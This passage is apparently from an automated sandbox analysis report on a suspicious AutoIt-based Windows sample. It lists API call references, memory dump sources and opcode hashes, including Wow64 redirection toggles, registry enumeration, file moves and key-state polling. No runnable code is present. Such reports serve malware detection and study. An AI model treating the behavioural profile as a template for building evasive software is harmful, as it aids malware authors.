                                                                                                    • Opcode Fuzzy Hash: 022ccf8da6227845dc46c425989fc546c9fb060447dd90414ac2a994d3b659a7
                                                                                                    • Instruction Fuzzy Hash: 52F03C35A40208BBDB11AB90DC49FAEBFE5EF48751F1101A8E90AB2260CF745E40DB95
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32 ref: 00AFD3AD
                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00AFD3BF
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00AFD3E5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                    • String ID: GetSystemWow64DirectoryW$X64
                                                                                                    • API String ID: 145871493-2590602151
                                                                                                    • Opcode ID: 80f2cf16ab37110ea8fae3983ef71a483148d84ced53a09634525a8506982667
                                                                                                    • Instruction ID: 43869acb66e2e55797f1b97375e92dffb65f5e853d1181b1a4536a306daf7a4f
                                                                                                    • Opcode Fuzzy Hash: 80f2cf16ab37110ea8fae3983ef71a483148d84ced53a09634525a8506982667
                                                                                                    • Instruction Fuzzy Hash: 8BF02032406A289BE72217908C08ABD3A66AF11B01B648284F706FA115DB30CD40A7D2
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AA4EDD,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4E9C
                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AA4EAE
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00AA4EDD,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4EC0
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                    • API String ID: 145871493-3689287502
                                                                                                    • Opcode ID: db1350036f5b492834b580897108c58df55a135f30b38e9a6a8bc25f890cdecd
                                                                                                    • Instruction ID: 103af36b1c969c8a6f3faf26b1be44d2b13a9ad3847cf8fc8fbdba541fff14f3
                                                                                                    • Opcode Fuzzy Hash: db1350036f5b492834b580897108c58df55a135f30b38e9a6a8bc25f890cdecd
                                                                                                    • Instruction Fuzzy Hash: 87E0CD36A059225BD23217657C18B9F7994AFC7F63B150115FC05F3150DFE4CD0156E0
                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AE3CDE,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4E62
                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AA4E74
                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00AE3CDE,?,00B71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00AA4E87
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                    • API String ID: 145871493-1355242751
                                                                                                    • Opcode ID: ac0a71cc9e70931278bce62e381acb4ba0efd1e4cfe63ba1f83073b1bc1fc6c9
                                                                                                    • Instruction ID: a055cf9d0303eeb6cce3254395e3e240e30b937ad9d92770c5e2a14bf63626ad
                                                                                                    • Opcode Fuzzy Hash: ac0a71cc9e70931278bce62e381acb4ba0efd1e4cfe63ba1f83073b1bc1fc6c9
                                                                                                    • Instruction Fuzzy Hash: 1CD0C236502A215746321B647C18EDF7E98AFCAF113150111F905F31A0CFA0CD0192D0
                                                                                                    APIs
                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00B2A427
                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B2A435
                                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B2A468
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00B2A63D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3488606520-0
                                                                                                    • Opcode ID: a93e0a2c374a1983c943af571107a37adddae531d60c76042bdf8a0257a35bbb
                                                                                                    • Instruction ID: 3e0af0f2be96942c91575899bc471b59fad0f4ed3a50b6a91ebcd505098ec123
                                                                                                    • Opcode Fuzzy Hash: a93e0a2c374a1983c943af571107a37adddae531d60c76042bdf8a0257a35bbb
                                                                                                    • Instruction Fuzzy Hash: FCA17F71604301AFE720DF24D986F2AB7E5AF84714F14885DF55A9B3D2DBB0EC418B92
                                                                                                    APIs
                                                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00B43700), ref: 00ADBB91
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00B7121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00ADBC09
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00B71270,000000FF,?,0000003F,00000000,?), ref: 00ADBC36
                                                                                                    • _free.LIBCMT ref: 00ADBB7F
                                                                                                      • Part of subcall function 00AD29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000), ref: 00AD29DE
                                                                                                      • Part of subcall function 00AD29C8: GetLastError.KERNEL32(00000000,?,00ADD7D1,00000000,00000000,00000000,00000000,?,00ADD7F8,00000000,00000007,00000000,?,00ADDBF5,00000000,00000000), ref: 00AD29F0
                                                                                                    • _free.LIBCMT ref: 00ADBD4B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                                                                                    • String ID:
                                                                                                    • API String ID: 1286116820-0
                                                                                                    • Opcode ID: 11f9192066450353ee29b6e14cf0f9000c273939d42ca14d8559594a82f90a69
                                                                                                    • Instruction ID: 1f8849aa37457a31fe8258cd1e4e9ca3e86b7384ecc06b6ddbb001ed0a71489b
                                                                                                    • Opcode Fuzzy Hash: 11f9192066450353ee29b6e14cf0f9000c273939d42ca14d8559594a82f90a69
                                                                                                    • Instruction Fuzzy Hash: 5951C571910209EFCB10EF699D819AEB7B8FF44350B12466BE456E73A1EF709E409B70
                                                                                                    APIs
                                                                                                      • Part of subcall function 00B0DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00B0CF22,?), ref: 00B0DDFD
                                                                                                      • Part of subcall function 00B0DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00B0CF22,?), ref: 00B0DE16
                                                                                                      • Part of subcall function 00B0E199: GetFileAttributesW.KERNEL32(?,00B0CF95), ref: 00B0E19A
                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 00B0E473
                                                                                                    • MoveFileW.KERNEL32(?,?), ref: 00B0E4AC
                                                                                                    • _wcslen.LIBCMT ref: 00B0E5EB
                                                                                                    • _wcslen.LIBCMT ref: 00B0E603
                                                                                                    • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00B0E650
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                                                                                    • String ID:
                                                                                                    • API String ID: 3183298772-0
                                                                                                    • Opcode ID: bb253a4fc96cacb4c0f0cf0556e1a6daeebf040c3d74fa44a14006a098d9f05f
                                                                                                    • Instruction ID: c911bcdcf880cc132739f93d2cbecf481410db6a19d91f2217ca4ccdd16b31c1
                                                                                                    • Opcode Fuzzy Hash: bb253a4fc96cacb4c0f0cf0556e1a6daeebf040c3d74fa44a14006a098d9f05f
                                                                                                    • Instruction Fuzzy Hash: 67518FB24083449BC724EBA4DC81ADFB7ECEF85340F00496EF59993191EF75E6888766
                                                                                                    APIs
                                                                                                      • Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD
                                                                                                      • Part of subcall function 00B2C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B2B6AE,?,?), ref: 00B2C9B5
                                                                                                      • Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2C9F1
                                                                                                      • Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2CA68
                                                                                                      • Part of subcall function 00B2C998: _wcslen.LIBCMT ref: 00B2CA9E
                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B2BAA5
                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B2BB00
                                                                                                    • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B2BB63
                                                                                                    • RegCloseKey.ADVAPI32(?,?), ref: 00B2BBA6
                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00B2BBB3
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                                                                                    • String ID:
                                                                                                    • API String ID: 826366716-0
                                                                                                    • Opcode ID: 3cf25cb6667b478e4dee73232265d4a75ddaeee23e3be25ca14533905c732013
                                                                                                    • Instruction ID: c7e114d2efdbe20e5973ad91a9e670bde9f0b22da481a263809e5190756ef8cc
                                                                                                    • Opcode Fuzzy Hash: 3cf25cb6667b478e4dee73232265d4a75ddaeee23e3be25ca14533905c732013
                                                                                                    • Instruction Fuzzy Hash: 5E61B031208241AFD714DF14D494E2ABBE5FF85348F1489ACF49A8B2A2DF31ED45CB92
                                                                                                    APIs
                                                                                                    • VariantInit.OLEAUT32(?), ref: 00B08BCD
                                                                                                    • VariantClear.OLEAUT32 ref: 00B08C3E
                                                                                                    • VariantClear.OLEAUT32 ref: 00B08C9D
                                                                                                    • VariantClear.OLEAUT32(?), ref: 00B08D10
                                                                                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00B08D3B
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Variant$Clear$ChangeInitType
                                                                                                    • String ID:
                                                                                                    • API String ID: 4136290138-0
                                                                                                    • Opcode ID: 69908abc108c5212fa916572fa4e31e4099b87d7e27c27dcc9aee91b183731cd
                                                                                                    • Instruction ID: 7499b61f8dd7426a7b85e42c30e2c88f3b2880d60fd0bae0ac65b2b95656dcd2
                                                                                                    • Opcode Fuzzy Hash: 69908abc108c5212fa916572fa4e31e4099b87d7e27c27dcc9aee91b183731cd
                                                                                                    • Instruction Fuzzy Hash: DB517DB5A00219EFCB10CF58C894AAABBF5FF89310B158669F945DB350E730EA11CF90
                                                                                                    APIs
                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B18BAE
                                                                                                    • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00B18BDA
                                                                                                    • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B18C32
                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B18C57
                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B18C5F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                                                    • String ID:
                                                                                                    • API String ID: 2832842796-0
                                                                                                    • Opcode ID: 70e56dbe46c5aba1f7039ff32c98f95f07d589609dc9f62a3a7ef6f3b7b533c6
                                                                                                    • Instruction ID: f9dfa906f05f1664f6bc1e1639c1c4c9a2ea795053712e376bf1e94492a661a8
                                                                                                    • Opcode Fuzzy Hash: 70e56dbe46c5aba1f7039ff32c98f95f07d589609dc9f62a3a7ef6f3b7b533c6
                                                                                                    • Instruction Fuzzy Hash: CA513035A00215DFCB05DF64C981AAEBBF5FF49314F088498E8496B3A2DB35ED51CB90
                                                                                                    APIs
                                                                                                    • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00B28F40
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00B28FD0
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000), ref: 00B28FEC
                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00B29032
                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00B29052
                                                                                                      • Part of subcall function 00ABF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00B11043,?,7529E610), ref: 00ABF6E6
                                                                                                      • Part of subcall function 00ABF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00AFFA64,00000000,00000000,?,?,00B11043,?,7529E610,?,00AFFA64), ref: 00ABF70D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                                                                                    • String ID:
                                                                                                    • API String ID: 666041331-0
                                                                                                    • Opcode ID: e71d1dca02844267b58940b30320eb7e8bb8d7a00a3f07039bec89bd00efa007
                                                                                                    • Instruction ID: 9ccb41d1a1876f7889c25f5be5005a27cf19f81264294818b1b10c843ea078f0
                                                                                                    • Opcode Fuzzy Hash: e71d1dca02844267b58940b30320eb7e8bb8d7a00a3f07039bec89bd00efa007
                                                                                                    • Instruction Fuzzy Hash: 24515C35A01215DFC711DF58D5948AEBBF1FF49314F0884A9E80AAB362DB31ED86CB90
                                                                                                    APIs
                                                                                                    • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00B36C33
                                                                                                    • SetWindowLongW.USER32(?,000000EC,?), ref: 00B36C4A
                                                                                                    • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00B36C73
                                                                                                    • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00B1AB79,00000000,00000000), ref: 00B36C98
                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00B36CC7
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$Long$MessageSendShow
                                                                                                    • String ID:
                                                                                                    • API String ID: 3688381893-0
                                                                                                    • Opcode ID: 91234cc0008848386cca3002039dc43bb952b57b3832f0968bf2e6072b8bef71
                                                                                                    • Instruction ID: 5f47505625142504154640b57b74b5815ffeb507a9cf18e4519efc24fcfc9a07
                                                                                                    • Opcode Fuzzy Hash: 91234cc0008848386cca3002039dc43bb952b57b3832f0968bf2e6072b8bef71
                                                                                                    • Instruction Fuzzy Hash: AB41E635A04104BFDB24CF68CC95FA9BFE4EB09350F6592A8F899A72E0D771ED41CA50
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _free
                                                                                                    • String ID:
                                                                                                    • API String ID: 269201875-0
                                                                                                    • Opcode ID: e7eb7cee21afe6a5b153a8f44983ad240ff86d0b1ee0ebbba56a3b6e4ff1234d
                                                                                                    • Instruction ID: 49c7f63668ff0a9b79fc3c472bd6293254cec7b52614e969864587b2a4d4ff96
                                                                                                    • Opcode Fuzzy Hash: e7eb7cee21afe6a5b153a8f44983ad240ff86d0b1ee0ebbba56a3b6e4ff1234d
                                                                                                    • Instruction Fuzzy Hash: C841B632A00200AFCB24DF78C981B6DB7B5EF99714F154569E516EB391DA31ED01DB80
                                                                                                    APIs
                                                                                                    • GetCursorPos.USER32(?), ref: 00AB9141
                                                                                                    • ScreenToClient.USER32(00000000,?), ref: 00AB915E
                                                                                                    • GetAsyncKeyState.USER32(00000001), ref: 00AB9183
                                                                                                    • GetAsyncKeyState.USER32(00000002), ref: 00AB919D
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AsyncState$ClientCursorScreen
                                                                                                    • String ID:
                                                                                                    • API String ID: 4210589936-0
                                                                                                    • Opcode ID: 75ea90d57ef912d3375f15e8942624de2bd4c2561916256da24b674a4c0a88a0
                                                                                                    • Instruction ID: bf075eb6c8dfd10ba95b2dfc7142a85dbfadb349be22ab327db1b703fbf6b8dc
                                                                                                    • Opcode Fuzzy Hash: 75ea90d57ef912d3375f15e8942624de2bd4c2561916256da24b674a4c0a88a0
                                                                                                    • Instruction Fuzzy Hash: CF414D7190850AAADB159FA8D844BFEBB74FF05320F208319F529A72A1CB345954DB51
                                                                                                    APIs
                                                                                                    • GetInputState.USER32 ref: 00B138CB
                                                                                                    • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00B13922
                                                                                                    • TranslateMessage.USER32(?), ref: 00B1394B
                                                                                                    • DispatchMessageW.USER32(?), ref: 00B13955
                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00B13966
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                                                    • String ID:
                                                                                                    • API String ID: 2256411358-0
                                                                                                    • Opcode ID: 0ba67dfead616cc1ba57ad6c3c10766081e46ab41bfc1063908a74cdeb08f994
                                                                                                    • Instruction ID: a4e830e2d66bb921c0c3c9e743f437661dd5aa28255e1270a2b4c696b1523622
                                                                                                    • Opcode Fuzzy Hash: 0ba67dfead616cc1ba57ad6c3c10766081e46ab41bfc1063908a74cdeb08f994
